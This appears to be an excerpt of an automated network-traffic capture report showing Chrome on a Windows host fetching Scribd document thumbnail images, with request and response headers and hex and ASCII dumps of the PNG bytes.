                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC1390INData Raw: 68 57 69 f9 b2 7a 32 a7 25 24 0d 54 da d6 16 41 96 f9 f3 40 43 0b 2a 98 e1 47 fe 0e 3d 29 e1 bc ab d0 49 21 88 dc 04 0f 28 ab 59 b3 30 02 fe bf 89 b4 ef 6c 3d da 31 43 69 79 40 32 6e bb 9d 1b c0 0a 05 20 cf c2 82 8b 39 cb bc d3 e5 e8 08 d8 59 e4 50 90 12 01 21 5d 02 7f dd c4 ce 54 5b 63 2d 6d 65 81 d8 a7 94 e4 d4 05 de c5 ba 0a e3 a9 4e 96 7a b1 51 21 6b a2 eb 01 5a 49 b0 33 b6 0d 59 1d 4f dc d0 c8 4c 91 ce 63 86 5f 55 da df 21 ab d7 1d 5c 6c 42 30 50 a5 50 f1 31 8f 01 ca 39 0e cc 20 9d e1 4c 0b 10 76 20 df 49 91 20 0b ed 1b f2 8a 00 6c 73 e0 4b 56 4d 9a a4 06 6b 34 0f 79 aa 45 c6 6e 26 f5 b6 9a ca 6e e1 2c e5 51 66 65 58 93 c6 91 54 ec 4d 36 46 92 9b 9f a8 23 19 8e f9 47 a7 6d 65 2c 63 1a cb 5c 19 cb 40 97 23 97 57 47 2e 59 1b 2e e4 b2 af 24 94 ac 66 71
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: hWiz2%$TA@C*G=)I!(Y0l=1Ciy@2n 9YP!]T[c-meNzQ!kZI3YOLc_U!\lB0PP19 Lv I lsKVMk4yEn&n,QfeXTM6F#Gme,c\@#WG.Y.$fq
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC1390INData Raw: b2 b0 61 38 ca 87 cf 51 a7 a9 e8 8a e9 7c 0b f8 66 a3 3a 41 c5 6a a5 c3 0c c0 e8 a3 96 7d 8a a7 4f 25 6f 39 f2 cd 64 bc 46 66 d5 67 66 63 19 33 1b 43 b3 be ad ac 6a b3 45 78 57 f8 12 94 ac 59 6e c4 6d 8f 86 9e ec 07 f1 d0 51 62 31 60 74 d1 53 ec 1c 50 6b 1c 44 68 46 00 cb 10 4d e9 7d 52 80 0e 60 b9 19 1b ba 5d f4 14 13 f3 8a 54 86 50 e1 6a a5 0c 91 4c 15 5b bc ef 32 05 79 50 61 a8 8b 26 86 1a 4d 55 8b 35 b0 98 d9 f9 b2 68 f0 d8 29 91 77 92 4d 96 05 7a c3 44 49 7a 11 2c f3 eb 86 d2 dc 5f 8f d1 36 ab 2c ba 36 59 12 31 06 05 c9 11 1b b8 91 95 50 a9 79 39 fa ef f5 0b 72 de 02 ba 09 6b 17 c4 21 c8 b4 ee c2 29 59 90 c2 e3 75 80 0e be 46 a9 91 b3 00 dd 00 fb 0c bb ea 36 40 eb 6f 60 a4 d7 26 50 ab e9 1d 50 2c 40 ad 93 22 4d 11 7b 35 7c 03 b6 55 7e 75 43 1d 83 cb
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: a8Q|f:Aj}O%o9dFfgfc3CjExWYnmQb1`tSPkDhFM}R`]TPjL[2yPa&MU5h)wMzDIz,_6,6Y1Py9rk!)YuF6@o`&PP,@"M{5|U~uC
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC1390INData Raw: 3d e8 99 77 ad 67 66 64 98 7d 1b 85 d7 5b 3d 81 c4 c4 bb d3 d1 61 0d b3 26 c0 76 f7 0e 41 48 65 d9 d7 90 01 2b 66 9f 9d bf da fd e3 6e af 7b 74 d4 45 23 fb 02 6a 16 50 a7 80 3a 66 bf 8f 72 ed ad ee 43 a2 0f e0 7c 93 65 45 06 6f 8a 65 5f 43 46 09 ee 78 30 e8 f7 ed 01 7a 3f 08 79 bf be 4e 43 7e 48 62 ef 3b 05 80 2d cc 2b 1d cf 81 37 86 7a 6c 0e 8e 40 0e 60 65 07 4f 95 ed 63 d9 ae 2c db 7f aa 6c 0f ca f6 7b b2 6c ef a9 b2 36 94 ed 0d 64 59 fb a9 b2 5d 28 8b ee f2 bc 6c f7 89 b2 c7 50 54 7e d9 b1 43 a3 4a 85 37 8b 1e 19 30 ac 13 1c 68 39 fe 38 45 34 37 91 00 71 e4 64 90 9d 35 b6 75 08 6d ed cb 6e 1d 3e 51 f2 a0 32 e0 07 4f 94 dc af 0c f7 fe 13 25 07 95 c1 1e 3c 51 b2 5f 19 ea fe 13 25 7b 95 81 ee 3d 51 d2 56 c7 d9 76 68 33 50 e1 8d a2 38 ca 11 ee 0e b9 69 70
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: =wgfd}[=a&vAHe+fn{tE#jP:frC|eEoe_CFx0z?yNC~Hb;-+7zl@`eOc,l{l6dY](lPT~CJ70h98E47qd5umn>Q2O%<Q_%{=QVvh3P8ip
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC1390INData Raw: c6 d9 13 6d c1 bb 9f 42 59 3a 7e dd 0b 95 e8 80 5b 3b 2f 4a 98 72 5a 9a e2 e5 94 ca da 35 14 24 f7 16 47 8d 87 59 9a 2a cf ef 2d 68 9d e9 04 4b e8 fc 33 71 22 c4 e2 da 5e 1f 7a f9 64 fd b7 c5 62 7b 65 18 98 ef 35 be b5 7e 65 dd ef 7d 9e 4a d5 26 56 c4 0d b0 bd 59 c8 78 a2 59 58 a2 d0 e8 87 00 26 73 6f f4 79 3a 86 ff 3e 5b 9f bf 98 9f 3b e3 e7 7b 26 e9 f0 94 7c 9e 03 bb 89 d5 6b 5a 4a 1e ef 2d 64 43 13 43 3d af ec db dc 20 46 1e 00 be bc 5f c2 9b 43 c7 f4 bc 09 c3 42 57 49 a8 45 4a 46 41 86 c3 61 08 24 95 92 d6 44 f5 01 25 43 85 ac d2 38 2a 4d 24 47 0d 12 aa b0 8a a7 a3 21 b5 43 b2 37 f8 9a 1b a4 e2 55 77 3e 9a 5e 84 96 d2 8c 21 43 d7 29 89 f4 bd a4 1e 4c 01 d1 30 55 67 60 a9 c3 65 50 80 a4 e6 1c df eb ba fe 89 94 3b 84 63 a2 99 08 b7 2c d7 47 d1 0f 7a 96
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: mBY:~[;/JrZ5$GY*-hK3q"^zdb{e5~e}J&VYxYX&soy:>[;{&|kZJ-dCC= F_CBWIEJFAa$D%C8*M$G!C7Uw>^!C)L0Ug`eP;c,Gz
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC1390INData Raw: 78 c0 2a 6b 23 05 ab 31 02 08 72 e7 45 48 83 ed a7 0f 9a 64 4f 52 5c 6e 97 ec 26 28 eb dd f9 df a9 1d 7e a7 14 5d 31 65 55 5f 21 ff 6c 8e 44 26 4d 22 4b 3e a1 08 c1 1c 60 c5 5a 41 42 47 58 0f 37 1f ae 0b 03 fd 4b 88 9c 93 4f 2c 2e fd fa 5c 60 2c 95 2d 23 6b b0 95 88 2d a4 aa 6b 2d 6d 20 de 4a 8a ad 18 4f cd a4 cd 97 60 ee f9 d2 bf e9 32 99 32 d4 54 4d f2 34 4d 99 cb 04 a8 d7 eb 97 5e bd c3 a6 4c c7 1f fc 40 c6 1b 55 41 c1 97 ef 3d ff d7 c9 e4 4b 12 ef fc eb f3 3d be e0 6a cd e5 95 d6 80 7a 00 58 d2 58 31 d8 48 45 78 aa be a5 95 dd dd 6a c2 a9 77 38 ac a6 38 5d 24 f4 20 de 0d 1d eb f9 70 f4 87 df f9 76 d6 f9 df 63 63 38 84 94 cb 8f f0 05 e9 2d 60 81 cf 8e 01 7f f5 cf d3 f6 67 6b f8 79 fa dc 10 fe 4d c0 ac 2a de ec 42 0e b4 51 e4 75 0e 51 9d c1 f6 f5 db 24
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: x*k#1rEHdOR\n&(~]1eU_!lD&M"K>`ZABGX7KO,.\`,-#k-k-m JO`22TM4M^L@UA=K=jzXX1HExjw88]$ pvcc8-`gkyM*BQuQ$
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC1390INData Raw: 05 76 44 e5 20 07 68 0a 5e 79 ca 95 f6 15 df 3d f5 5c 40 39 2b 5d 9b b5 5b aa ff d2 b6 76 85 67 b9 e7 89 45 35 ec d8 95 cd 5c 0e 5c a2 20 26 14 ad d5 77 0f 4d e8 9a b7 6c a0 ea a6 83 ca 42 a4 ee d1 04 94 68 09 52 f1 a0 96 d8 1a b3 63 ed ef 54 77 6a 2d 61 08 e0 83 5b 1e 23 1e 7a 60 38 2c 81 98 0d 40 10 95 3e e3 55 5b 38 5e ea 2d de 95 55 a7 92 90 61 09 98 16 89 04 1a 9b 4d c4 83 98 cc 69 70 e5 67 81 f3 18 66 17 61 46 d3 da 68 65 d3 ac 79 65 a4 42 98 06 88 6d 83 47 c5 fa 36 4f 43 1e cc 0e e3 cf f0 27 03 10 91 cd f1 fc 13 b8 85 b4 13 78 8b 64 ed 1c 1e 4f 4b 7c ab ec 7e e9 27 47 34 d8 e7 b7 27 e2 4d bc ac 60 45 4f 4d 43 53 22 fe d8 ba 78 fd f3 eb 4f 97 af df 96 47 e0 06 a3 ae 3b b1 f5 86 11 56 eb 8d 47 4a 10 dc 5f f0 82 e7 1e 82 1d 4a 99 c6 ab a9 19 5e 12 77
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: vD h^y=\@9+][vgE5\\ &wMlBhRcTwj-a[#z`8,@>U[8^-UaMipgfaFheyeBmG6OC'xdOK|~'G4'M`EOMCS"xOG;VGJ_J^w


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        120192.168.2.1649861151.101.194.1524436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC411OUTGET /img/word_document/308030757/149x198/2af38cbda9/1731726615?v=1 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: imgv2-1-f.scribdassets.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC566INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 13524
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: max-age=864000,stale-while-revalidate=86400,stale-if-error=86400
                                                                                                                                                                                                                                                                                                                                                                                        Server: envoy
                                                                                                                                                                                                                                                                                                                                                                                        X-Envoy-Upstream-Service-Time: 57
                                                                                                                                                                                                                                                                                                                                                                                        X-Scribd-Default-Image: false
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Age: 67703
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:40 GMT
                                                                                                                                                                                                                                                                                                                                                                                        X-Served-By: cache-chi-klot8100095-CHI, cache-nyc-kteb1890087-NYC
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: HIT, HIT
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache-Hits: 2, 0
                                                                                                                                                                                                                                                                                                                                                                                        X-Timer: S1733522381.643627,VS0,VE1
                                                                                                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC1378INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 95 00 00 00 c6 08 03 00 00 00 ec 66 32 24 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 03 00 50 4c 54 45 fd fd fd 9d 9d 9d 9f 9f a3 f7 f7 f7 9f 9d a3 f9 f9 f9 a1 a1 a1 ff ff ff 9f 9f 9f fb fb fb c1 c1 c1 f5 f5 f5 ff fd ff 9d 9d a1 f3 f3 f3 c3 c3 c3 a1 9f a5 eb eb eb f1 f1 f1 c7 c7 c7 e5 e5 e5 c9 c9 c9 a3 a3 a3 fd fd ff e7 e7 e7 a9 a9 a9 ed ed ed e9 e9 e9 e3 e3 e3 a5 a5 a5 a7 a7 a7 9f 9f a1 ef ef f0 ab ab ab c5 c5 c5 b7 b7 b7 bb bb bb 9d 9d 9f d5 d5 d6 d9 d9 d9 e1 e1 e2 9f 9d a1 db db db ef 40 4c bf bf bf af af b0 cb cb cb f3 3e 4a b9 b9 b9 df df e0 d7 d7 d8 cd cd cd b5 b5 b5 bd bd bd 7b 7b 7b f9 ff ff b1 b1 b1 ad ad ad cf cf cf 9b 9b 9b 82 82 84 dd dd
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: PNGIHDRf2$gAMAasRGBPLTE@L>J{{{
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC1378INData Raw: b0 b0 d8 d7 b3 07 c0 5d 54 ea 93 c1 97 72 1a 0b b6 07 f1 ea 12 ab 9e e5 04 0c 1a af dd 40 a7 29 59 c1 d8 ed 54 b2 d9 6c 83 3f 21 1a 69 6d 25 d9 a3 7e 4d c1 af b7 1d 92 10 9f cb 9d 1b 2b ac bc a3 49 77 b7 2b b1 5b 00 9d d5 d3 3a 47 33 4b 34 af 48 68 66 92 54 0b 35 21 32 23 58 01 ec 58 40 56 d0 36 a2 a0 34 e8 49 14 75 de a9 d1 2c 49 ec 2f 98 04 6b 40 95 43 e2 e2 11 1a 22 41 bc 8a 64 f5 82 07 90 eb 66 79 28 e7 86 71 56 a1 9b 54 4a f2 75 c9 8a cc 6b 8b 35 ac ca cd 76 2f 29 71 7c bc a9 45 5d 79 bf e1 08 63 05 8e d8 57 d2 d0 b6 30 ea 01 71 82 9e 70 c2 24 79 cc 59 f9 35 c6 f2 ea dd b3 c3 99 64 c5 38 12 98 57 16 42 25 6d 1a b1 c2 9f 9d b1 7f 5f 2c 7f fa 54 46 fc 5e 66 17 81 fc 78 59 57 70 8c b0 a5 8c 21 b7 1c 24 87 85 22 47 a1 50 28 96 03 70 de 6c f7 ba dd af dd
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ]Tr@)YTl?!im%~M+Iw+[:G3K4HhfT5!2#XX@V64Iu,I/k@C"Adfy(qVTJuk5v/)q|E]ycW0qp$yY5d8WB%m_,TF^fxYWp!$"GP(pl
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC1378INData Raw: 9d 15 6e 4f d8 6b 89 95 53 fc e9 61 ff c3 a1 42 ff 2b 7a ed 11 1f d5 a9 60 85 a3 57 cf 0a 40 69 49 84 5b af 7e 7e d4 96 88 57 c5 04 ba 24 76 7b db 5a 8e 18 35 79 a6 36 dc 50 57 58 12 05 ab e2 90 6c e1 2c bf 45 e4 d9 82 62 f5 cf 1f 59 cd b4 15 a6 7f cd 66 70 40 59 41 a7 b4 2e db db 86 13 aa 45 44 d9 5c 9b 9c 64 0c 86 81 e6 95 5c db dc 40 9d 6c 87 ba e2 ac ac de c7 b0 d4 62 fb 50 61 db 2c df 7f b8 0e 81 fd 49 ae c3 fb 2b c8 dd b1 62 6e 87 9d 0c b2 da 02 b2 e3 c7 58 11 12 0e f2 0e 1b 8a 89 b5 ef ca 1c 8e f0 96 12 dd d8 c5 19 68 95 15 38 47 cb ac 72 a5 b4 39 35 15 1e 62 aa 79 2c 74 35 36 bf 4d d3 76 84 e9 0d 1b 0b e1 90 1a 27 47 47 6c 14 80 45 59 73 a1 20 29 fa a0 ec 24 36 12 c4 8b c2 ce 23 36 46 b1 5e 65 24 70 2a 24 a4 4e 50 85 dc 82 e6 86 89 89 c7 6b 53 b4
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: nOkSaB+z`W@iI[~~W$v{Z5y6PWXl,EbYfp@YA.ED\d\@lbPa,I+bnXh8Gr95by,t56Mv'GGlEYs )$6#6F^e$p*$NPkS
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC1378INData Raw: 05 a8 24 aa db cd 9c a7 05 e7 e7 a2 32 2a 31 19 d7 53 df e1 58 4e c3 16 e0 38 60 d3 27 03 40 98 b1 df 04 7b 95 f4 d3 2c 0b b6 b3 af 31 8b ca 90 4c 98 38 bc 71 54 41 f2 a6 94 b8 4a 7b 25 b9 32 5a ca c5 62 03 c1 eb 51 51 2f 76 26 10 db ce 50 25 eb 17 e1 10 93 66 8e 74 0c 4a 35 2b 80 81 93 4e 8c 29 a7 c7 91 5d 9c 94 96 e3 e6 3e 9d 8f c7 a5 a8 16 bf 6b 6b 85 48 db 81 f0 e1 d5 fe b5 a9 4e d7 d2 d9 d9 92 95 88 8a ca 14 17 ba 27 29 2a 6b 92 f7 79 32 0c 95 a7 99 ba 3e 96 ef e1 c9 10 98 ae 13 8e 41 45 35 e9 b4 a4 4c 7c 49 3e c2 d0 d1 a5 04 63 05 95 a5 d3 c7 58 7a b6 35 1c 56 51 d5 d4 20 92 6e 07 a5 b3 26 71 26 14 21 49 33 c6 e1 66 c8 b7 cf cc a5 e7 e1 e0 26 3b 5c d5 db 21 ed a7 a8 d8 12 d2 ee c9 f0 a1 1a 9e 2b 29 24 0a ac 6c 8b 51 ae ab 11 eb 75 be dc 6c 4d ed 2e
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: $2*1SXN8`'@{,1L8qTAJ{%2ZbQQ/v&P%ftJ5+N)]>kkHN')*ky2>AE5L|I>cXz5VQ n&q&!I3f&;\!+)$lQulM.
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC1378INData Raw: 29 8a 89 d5 69 35 10 f0 c2 7a 5a 8e 27 16 3d eb 79 60 b5 41 c0 13 64 b5 3b 68 7a af 45 02 9d d6 ca 98 28 2a de c6 50 b1 26 2f 46 42 51 54 6c af 9e 2a 86 2a 5b 91 90 4a 1b d9 b4 5a 9b ed 66 e3 82 e1 4f 0d 55 6c a5 5c 55 5f 1f 46 b5 45 b3 0a aa 03 6e dd a6 de 32 65 78 9b 8e 66 85 f3 a3 73 1e 29 de 48 45 2f 8f 4a af 47 f5 84 9c 19 79 5f ed ed cd 9d 32 fa bf 40 c5 09 5e 3a a3 2e cf b8 17 ab c9 14 84 b7 71 84 1b 4f 84 d4 11 a9 3f 6c fa e7 9b 3f a1 e2 70 58 21 e5 ea 2c 8c aa d8 f2 ff 10 aa da f7 7e d3 fb ee 98 32 77 91 cb e8 41 06 06 06 5e 3a b2 c2 e1 89 d7 ce 9e 5b 59 c1 8f 5e fb 51 cf e8 68 cf c0 71 76 93 ca 91 9e f1 da 29 6e 62 54 96 a7 c7 9f ee e9 09 06 6b b5 c7 8f 0f 0f 0f 0f b0 07 54 06 4f 9d 3b c8 8d 0f 05 0f 4c 4c 54 0e 8c 4c ad 9c 3a 35 5a 44 66 0e 4e
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: )i5zZ'=y`Ad;hzE(*P&/FBQTl**[JZfOUl\U_FEn2exfs)HE/JGy_2@^:.qO?l?pX!,~2wA^:[Y^Qhqv)nbTkTO;LLTL:5ZDfN
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC1378INData Raw: 62 cc 64 02 b6 86 a6 69 bb 09 fc 14 5a 74 1e 4c 85 d1 1c 15 6e 44 58 c2 da ea d5 95 97 4b 24 16 ef be cf 68 90 91 fe f6 56 47 be 6a b7 98 4a 59 c6 e3 6c 18 10 28 6b 6e e9 43 ad 60 ef 10 7f e9 d2 f3 72 63 e0 57 65 65 e2 b3 cd e8 a1 16 35 a7 a7 5d 24 47 35 38 74 97 a3 c2 84 b6 22 81 14 b4 4d 6d 2a 50 e1 a8 cc da ba 17 0f d8 c3 76 45 57 af b6 d1 e0 36 6c 88 6a cf a4 3a 9a 4c 08 a8 5c 56 8a e2 a8 74 bc 97 a6 28 0f a9 f4 07 0f 65 0c 45 e0 d5 b1 47 5d 30 56 61 82 6c 03 45 d2 94 86 81 e6 c8 53 f1 51 54 a6 6d f5 5a 38 49 ef b4 0a 1a 51 82 6a 0f ae 7a a1 d7 46 f5 dc e2 34 f4 d7 ce a3 48 10 e7 fb 92 1e 08 a3 cd b6 f5 de 22 d9 ff ca 6b b1 49 73 eb 0a 47 18 c6 1d 7c e2 cd 66 1b 6c de b9 91 49 04 91 69 dd c6 58 4b e2 f4 1e fc ef a8 ca e0 ef df 28 ac 2b 9e 6d 7b 61 1e
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: bdiZtLnDXK$hVGjJYl(knC`rcWee5]$G58t"Mm*PvEW6lj:L\Vt(eEG]0ValESQTmZ8IQjzF4H"kIsG|flIiXK(+m{a
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC1378INData Raw: e0 1a 69 29 0c 9b 81 64 cd 29 c8 6e ff 44 65 b1 54 d0 98 4a 02 3c 54 4b 08 d8 85 9a 54 e2 28 0d 25 ac 91 26 60 bd cd 19 ce eb 2b a7 19 e8 79 5d 83 de a4 aa 09 14 c7 7a 4e 18 fc b9 b4 a2 c1 a2 f0 04 4e 39 eb 1f e7 7b b0 b8 7f 45 d0 76 e3 43 f8 e4 b3 32 29 55 3c 9e f8 79 e6 4b 22 01 1b 5e a9 54 a9 79 62 2c e7 fb f3 40 b4 ab e4 a4 70 41 39 78 84 2a a5 18 53 2a 6b 0a 33 60 98 58 8c f1 78 65 3c 25 56 3c 3b 97 e0 e2 81 17 b8 11 26 3e e9 12 df fc ee b9 db 1c 55 1b d7 6e ff d1 3b 85 4a f2 6f 98 eb fb 9f 14 8c e5 ce b1 df bf 50 f9 ee ad 5b 97 4a a0 ab 95 17 b9 76 c5 df fe 9f a9 60 f8 cd 12 40 f6 f1 fb f9 e3 f6 37 b8 be f8 db 47 bd 00 df 24 93 f9 82 c2 b0 ff e8 92 e3 4d a3 6f 5f e5 ba 14 ae fe 9b 98 6b 89 4d 23 49 c3 dd 2e aa e9 a2 d7 6d d3 80 dd d0 40 ba c1 01 82
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: i)d)nDeTJ<TKT(%&`+y]zNN9{EvC2)U<yK"^Tyb,@pA9x*S*k3`Xxe<%V<;&>Un;JoP[Jv`@7G$Mo_kM#I.m@
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC1378INData Raw: 86 fb 16 06 e0 56 92 2e e2 d5 a9 22 e3 68 9a fa 5a dd 2a e8 4a 8b f7 49 d7 48 17 92 7c 51 e2 f4 ab 7d 8c 6a 67 06 08 24 95 57 2a 80 f1 58 c6 24 0b 19 70 2b cb 3c bc 30 f2 5e 2d a4 25 55 c7 f6 07 bb 35 03 10 fa e6 95 f5 b4 77 1a 0a 5f 98 c7 23 f2 de 49 34 72 11 88 ff 60 76 b2 f2 65 ad 31 d6 95 d1 e9 0e d8 1d 9b 23 dd 12 8a 1b 2d 18 26 97 f2 d6 e9 4e fd 54 e6 f8 0d b3 8b 77 1a bd c6 46 b2 b4 cf 16 61 e6 cc ec c4 57 ce 58 14 0a ae b4 33 52 a2 fc 96 43 fa 15 8e 1d 54 fa 95 a5 dd ca b7 4a 21 21 06 a4 56 9a a0 9a 4e ea 79 4c 12 1f 02 f2 65 e0 34 a5 c8 30 76 9a 89 a6 c9 54 43 c1 e1 50 83 ea 31 a9 59 a4 71 e1 34 05 f4 57 8d e9 05 ac d5 25 b3 17 d5 08 48 4e b2 32 3d c7 7d ed 4e 99 d7 14 4a 5a 70 51 c9 2e 31 a7 33 be e5 8a e0 c4 7d b7 af ae 0e 85 7d fd 42 1a 15 0e
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: V."hZ*JIH|Q}jg$W*X$p+<0^-%U5w_#I4r`ve1#-&NTwFaWX3RCTJ!!VNyLe40vTCP1Yq4W%HN2=}NJZpQ.13}}B
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC1378INData Raw: e9 3f 8d 9d cd 6f 1a 49 16 c0 bb 81 6e 57 c1 b8 db b4 6d cc b7 db 60 08 b6 c0 02 0c 23 03 06 0e 44 96 25 af 26 73 cb dd 52 a4 95 e7 b0 87 91 72 5d 29 7b cb a5 a5 48 7b 98 cc 6d 32 b7 cc 29 77 fe 8b 39 e4 9c 3d 6f ce b1 26 2b 6d bd f7 aa ba ab db 78 67 df c1 02 03 cd a3 ba ea d5 7b af aa 7e 6f b3 56 e2 9b f6 4d b3 27 46 79 b6 e1 28 74 ad 8a 91 83 7c a9 a1 a7 7b b6 72 cd 9c e4 c9 00 c8 8d 45 5a 05 a7 5e 32 a3 9e af b1 0f ba 56 d7 34 06 3b c0 3b a9 29 3a 9e f7 a8 56 c2 f6 9e 85 4b 93 21 8f 9a 22 d3 99 ab e7 74 d2 c7 f6 f4 5a 88 8d 2c 0b a7 59 f6 7d 27 34 b6 e2 1f b9 98 a3 bb d7 2f ee e5 23 10 0e cf f6 1a e2 b7 57 c8 da 48 04 96 97 3c 5f 56 2e 07 f2 04 5a 7a 7c 26 b9 a6 70 f0 21 1d b2 2b 84 e7 00 d0 e7 08 b7 a1 08 c9 92 34 e5 70 79 3a 81 1a 36 dd 2f c6 d2 52
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ?oInWm`#D%&sRr]){H{m2)w9=o&+mxg{~oVM'Fy(t|{rEZ^2V4;;):VK!"tZ,Y}'4/#WH<_V.Zz|&p!+4py:6/R
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC1122INData Raw: de 3e 97 7d d2 1a 60 c2 4b bc ed 58 55 4c 58 08 57 25 47 bd c9 da 2b d8 b5 42 01 4a a8 88 bf fb d8 94 53 ac ea e2 94 0a a6 d2 4a c7 69 ae 20 ad 73 6d a8 3c a4 6b 49 72 83 9e 03 09 f6 20 9e 99 c5 a9 5c b4 a6 a0 9c 76 6b c8 cc 5e b7 db 1d 4f 55 69 12 78 e7 52 e2 20 c5 34 6d da 28 80 ec b0 68 6b 0b 97 cc a8 3f d7 8a ef 51 ff 81 d5 90 48 2b 6e 9c 36 8a 95 a2 92 3d 5c 9b 08 ac 18 3f 9a 9f 8b 78 27 4a d5 b6 a1 63 88 9e 41 6e bd 5f 2a f5 2e 94 88 2f 0b d2 e1 e2 2c 54 4b c8 64 74 fc ad 94 d4 f6 f2 00 96 e0 d7 c6 56 18 90 a4 b3 3a c5 89 1b 0e d7 dc 2f ec ed f9 73 27 a4 c0 3b b0 3a b3 bb af cf b6 bb 05 31 ba e7 0a a9 51 39 b5 74 f2 9f e7 46 11 d6 99 e8 ed ab af 1b d4 da 5e 5e 89 df b3 d8 cb e7 03 d5 57 dd 82 cf e3 8b d7 5b ba 7f 95 e5 eb 23 8c 9e 6a 75 64 43 ef c2
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: >}`KXULXW%G+BJSJi sm<kIr \vk^OUixR 4m(hk?QH+n6=\?x'JcAn_*./,TKdtV:/s';:1Q9tF^^W[#judC


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        121192.168.2.1649862151.101.194.1524436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC411OUTGET /img/word_document/309859835/149x198/394d1573f0/1716986829?v=1 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: imgv2-1-f.scribdassets.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:41 UTC569INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 13227
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: image/png
